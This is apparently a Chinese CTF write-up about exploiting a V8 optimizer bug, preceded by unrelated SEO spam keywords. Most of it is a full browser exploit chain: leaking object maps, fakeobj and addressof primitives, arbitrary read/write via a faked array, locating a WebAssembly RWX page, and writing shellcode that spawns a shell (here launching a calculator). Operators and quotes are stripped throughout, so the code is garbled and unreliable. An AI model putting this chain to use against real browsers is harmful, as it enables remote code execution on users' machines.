网站运营课程,群晖 建非wordpress,容桂网站制作代理,一级消防工程师考试成绩第一次知道原来各种map也是申请的一段连续的内存空间来存储#xff0c;所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目#xff0c;收货很多
class Memory{constructor(){th…第一次知道原来各种map也是申请的一段连续的内存空间来存储所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目收货很多
class Memory{constructor(){this.buf new ArrayBuffer(8);this.f64 new Float64Array(this.buf);this.u32 new Uint32Array(this.buf);this.bytes new Uint8Array(this.buf);}d2u(val){ //double Uint64this.f64[0] val;let tmp Array.from(this.u32);return tmp[1] * 0x100000000 tmp[0];}u2d(val){ //Uint64 doublelet tmp [];tmp[0] parseInt(val % 0x100000000);tmp[1] parseInt((val - tmp[0]) / 0x100000000);this.u32.set(tmp);return this.f64[0];}
}
function hex(i)
{return i.toString(16).padStart(16, 0);
}
var store[];
var memnew Memory();
function readmap_()
{var map_obj[1.1,2.2,3.3];var map_tmp{x:3};return [map_obj[map_tmp.x],map_obj,map_tmp];
}
function readmap()
{for(let i0;i12000;i)readmap_();return readmap_()[0];
}
var float_mapmem.d2u(readmap());
var obj_mapfloat_map0xa0;
console.log([*] float_map is 0xhex(float_map));
console.log([*] obj_map is 0xhex(obj_map));
var float_mappmem.u2d(float_map);
var obj_mappmem.u2d(obj_map);function fakeobj_(address)
{var arr_1[address,address,address];var tmp_1{x:3};arr_1[tmp_1.x]obj_mapp;return arr_1;
}
function fakeobj(address)
{for(let i0;i12000;i){var tmpfakeobj_(address);}return tmp[0];
}
var float_objfakeobj(float_mapp);
function addressof_(object)
{var arr_2[object,object,object];var tmp_2{x:3};arr_2[tmp_2.x]float_obj;return arr_2;
}
function addressof(object)
{for(let i0;i12000;i){var tmpaddressof_(object);}return tmp[0];
}
var objt{a:1};
var arbfnew ArrayBuffer(0x1234);
var obj{a:mem.u2d(0x5678)};
var fakeArray[float_mapp,mem.u2d(0),mem.u2d(0),mem.u2d(0x100000000000),1.1,2.2
].slice(0);
var fakeArrayaddrmem.d2u(addressof(fakeArray));
fakeArray[2]mem.u2d(fakeArrayaddr);
var victimfakeobj(mem.u2d(fakeArrayaddr0x190));
console.log([*] fakeArrayaddr is hex(fakeArrayaddr));
//console.log([*] victim length is 0xhex(victim.length));
var buf_idx0;
var obj_idx0;
var max_idx0x300;
for(let i0;imax_idx;i)
{let tmem.d2u(victim[i]);if(t0x1234)buf_idxi1;if(t0x5678)obj_idxi;
}
class ArbitraryRW
{addressof(newobj){obj.anewobj;return mem.d2u(victim[obj_idx]);}read64(address){victim[buf_idx]mem.u2d(address);var dtnew DataView(arbf);return mem.d2u(dt.getFloat64(0,true));}
}
var arwnew ArbitraryRW();
var objarray[objt,objt];
var objaddrarw.addressof(objt);
console.log([*] objaddr is 0xhex(objaddr));
console.log([*] buf_idx is 0xhex(buf_idx));
console.log([*] obj_idx is 0xhex(obj_idx));
var wasmCode new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule new WebAssembly.Module(wasmCode);
var wasmInstance new WebAssembly.Instance(wasmModule, {});
let wasmFunc wasmInstance.exports.main;
var inst_addrarw.addressof(wasmInstance);
var rwx_addrarw.read64(inst_addr0x88-1);
console.log([*] inst_addr is 0xhex(inst_addr));
console.log([*] rwx_addr is 0xhex(rwx_addr));//write shellcode to the rwx address
victim[buf_idx]mem.u2d(rwx_addr);
var dtnew DataView(arbf);
const shellcode new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i0;ishellcode.length;i) {dt.setUint8(i,shellcode[i], true);
}
wasmFunc();
